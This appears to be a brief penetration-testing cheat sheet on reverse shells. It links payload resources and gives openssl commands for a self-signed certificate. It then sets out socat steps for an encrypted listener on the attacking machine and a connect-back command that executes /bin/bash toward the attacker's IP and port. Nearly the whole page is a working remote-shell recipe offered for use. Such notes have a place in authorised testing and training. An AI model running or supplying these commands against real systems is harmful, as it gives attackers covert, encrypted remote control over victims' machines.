Reverse Shells - security

Cheatsheets

PayloadsAllTheThings
PentestMonkey Cheatsheet
SecLists
        

Generate OpenSSL Certificate

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# creates a 2048 bit RSA key with matching cert file, self-signed, and valid for just under a year.

We then need to merge the two created files into a single .pem file:
cat shell.key shell.crt > shell.pem
        

Set up OpenSSL Reverse shell listener

1. Generate shell.pem file using steps in "Generate OpenSSL Certificate"
2. Set up listener on attacking machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
3. Connect back using: socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash